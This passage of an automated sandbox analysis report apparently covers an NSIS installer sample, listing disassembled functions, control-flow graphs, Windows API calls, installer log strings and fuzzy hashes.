178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                                                          APIs
                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                          • ShowWindow.USER32(?), ref: 00401753
                                                                                                          • ShowWindow.USER32(?), ref: 00401767
                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                          Strings
                                                                                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                          • SetFileAttributes failed., xrefs: 004017A1
                                                                                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                          • Rename on reboot: %s, xrefs: 00401943
                                                                                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                          • Rename: %s, xrefs: 004018F8
                                                                                                          • detailprint: %s, xrefs: 00401679
                                                                                                          • Aborting: "%s", xrefs: 0040161D
                                                                                                          • Jump: %d, xrefs: 00401602
                                                                                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                          • Sleep(%d), xrefs: 0040169D
                                                                                                          • Rename failed: %s, xrefs: 0040194B
                                                                                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                          • BringToFront, xrefs: 004016BD
                                                                                                          • Call: %d, xrefs: 0040165A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                          • API String ID: 2872004960-3619442763
                                                                                                          • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                          • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                                          • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                          • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                                                                                          Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                                                          APIs
                                                                                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                          • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                                          • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                                          • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                          • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                          • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                            • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                          • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                          • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                          • API String ID: 608394941-1650083594
                                                                                                          • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                          • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                                          • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                          • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                                                                                          Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,HeadersLobbyDeclineGirlfriend,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,HeadersLobbyDeclineGirlfriend,HeadersLobbyDeclineGirlfriend,00000000,00000000,HeadersLobbyDeclineGirlfriend,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                          • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$HeadersLobbyDeclineGirlfriend
                                                                                                          • API String ID: 4286501637-2706768650
                                                                                                          • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                                                          • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                                          • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                                                          • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                                                                                          Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 00403598
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                          Strings
                                                                                                          • Inst, xrefs: 0040366C
                                                                                                          • Error launching installer, xrefs: 004035D7
                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                          • soft, xrefs: 00403675
                                                                                                          • Null, xrefs: 0040367E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                          • API String ID: 4283519449-527102705
                                                                                                          • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                          • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                                          • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                          • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                                                                                          Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                          • GetTickCount.KERNEL32 ref: 00403464
                                                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                          • wsprintfW.USER32 ref: 004034A4
                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                          • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountFileTickWrite$wsprintf
                                                                                                          • String ID: ... %d%%$P1B$X1C$X1C
                                                                                                          • API String ID: 651206458-1535804072
                                                                                                          • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                          • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                                          • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                          • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                                                                                          Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                          • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                          • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                          • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                          • String ID:
                                                                                                          • API String ID: 2740478559-0
                                                                                                          • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                                          • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                                          • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                                          • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                                                          Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 750 4030e3-4030f2 734->750 751 402387-40238d GlobalFree 734->751 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 747->750 763 402708-40270e 748->763 751->750 763->750
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                          • GlobalFree.KERNELBASE(007FCAD8), ref: 00402387
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
